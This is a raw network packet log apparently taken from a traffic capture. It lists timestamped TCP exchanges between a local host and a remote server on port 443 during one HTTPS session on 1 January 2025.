Jan 1, 2025 16:54:09.199368000 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.199374914 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.199402094 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.200408936 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.200444937 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.200469971 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.200478077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.200491905 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.200517893 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.200922966 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.200958014 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.200980902 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.200989962 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.201003075 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.201023102 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.201980114 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202016115 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202033043 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.202039003 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202054024 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202059984 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.202075958 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.202080011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202107906 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.202832937 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202873945 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202884912 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.202893972 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.202918053 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.203841925 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.203881025 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.203888893 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.203896046 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.203922033 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.203924894 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.203963041 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.203972101 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.204014063 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.240199089 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.240334988 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.287919998 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.287969112 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.288003922 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.288039923 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.288053989 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.288208008 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.288511992 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.288544893 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.288568020 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.288574934 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.288599968 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.288624048 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.288953066 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.288989067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289011955 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289017916 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289043903 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289058924 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289325953 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289357901 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289372921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289377928 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289406061 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289429903 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289433002 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289449930 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289478064 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289483070 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289529085 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.289535999 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.289586067 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.290270090 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.290302992 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.290323019 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.290329933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.290353060 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.290373087 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.290436029 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.290471077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.290488958 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.290494919 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.290515900 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.290534973 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.291208982 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.291244030 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.291265011 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.291270971 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.291290045 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.291305065 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.291333914 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.291340113 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.291349888 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.291367054 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.291683912 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.291688919 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.291738033 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.292182922 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.292237997 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.292336941 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.292378902 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.292388916 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.292393923 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.292413950 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.292418003 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.292459011 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.292464972 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.292510986 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.293157101 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.293199062 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.293240070 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.293240070 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.293246984 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.293292046 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.293299913 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.293334007 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.293355942 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.293364048 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.293380022 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.338206053 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.376635075 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.376657009 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.376732111 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.376740932 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.376784086 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.376902103 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.376915932 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.376961946 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.376969099 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.377012014 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.377443075 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.377458096 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.377516031 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.377522945 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.377569914 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.378084898 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.378103018 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.378148079 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.378158092 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.378202915 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.381305933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.381324053 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.381395102 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.381402969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.381438017 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.381859064 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.381875038 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.381925106 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.381932020 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.381964922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.381974936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.382230997 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.382247925 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.382297993 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.382304907 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.382347107 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.387350082 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.417294979 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.417313099 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.417378902 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.417412996 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.417455912 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465075970 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465101004 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465143919 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465151072 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465195894 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465361118 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465375900 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465428114 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465440035 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465480089 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465656042 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465681076 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465723991 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465732098 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.465760946 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465785027 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.465991020 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466006994 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466054916 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466061115 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466104031 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466243982 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466264009 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466295958 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466303110 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466331005 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466346979 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466607094 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466623068 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466670990 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466675997 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466710091 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466710091 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466721058 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466742039 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466759920 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.466767073 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.466808081 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.467091084 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.467104912 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.467159986 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.467170000 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.467211008 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.553823948 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.553844929 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.553946018 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.553955078 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.553968906 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.553989887 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554001093 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554007053 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554040909 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554071903 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554243088 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554258108 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554316044 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554323912 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554363012 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554554939 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554609060 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554820061 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554879904 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554888964 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554904938 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.554956913 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.554963112 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555011988 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.555119991 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555138111 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555186033 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.555191994 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555232048 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.555449009 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555468082 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555502892 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.555510998 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555532932 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.555546045 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.555665970 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555681944 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555732965 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.555737972 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.555779934 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.582983017 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.643840075 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.643857002 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.643909931 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.643919945 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.643985987 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.644212008 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.644227982 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.644265890 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.644273043 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.644328117 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.644709110 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.644726038 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.644821882 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.644830942 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.644872904 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.645035982 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645051003 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645090103 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.645097017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645145893 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.645559072 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645574093 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645622969 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.645670891 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.645673990 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645730972 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.645898104 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645914078 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.645963907 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.645972013 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.646018028 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.646430969 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.646449089 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.646481991 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.646487951 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.646512032 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.646533966 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.646830082 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.646845102 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.646872044 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.646878004 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.646904945 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.646923065 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.650298119 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.731344938 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.731368065 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.731399059 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.731408119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.731431007 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.731441975 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.731611967 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.731627941 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.731668949 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.731674910 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.731710911 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.731791973 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.731848001 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732054949 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732103109 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732116938 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732131958 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732155085 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732182980 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732187986 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732227087 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732350111 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732366085 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732403040 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732409954 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732424974 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732445955 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732665062 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732681036 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732711077 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732717991 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.732743025 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.732812881 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.733020067 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.733035088 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.733066082 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.733072042 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.733088017 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.733110905 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.733234882 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.733249903 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.733293056 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.733299017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.733325005 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.733334064 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.810975075 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.819946051 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.819967031 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.820015907 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:09.820035934 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:09.820070028 CET	49983	443	192.168.2.5	188.114.97.3
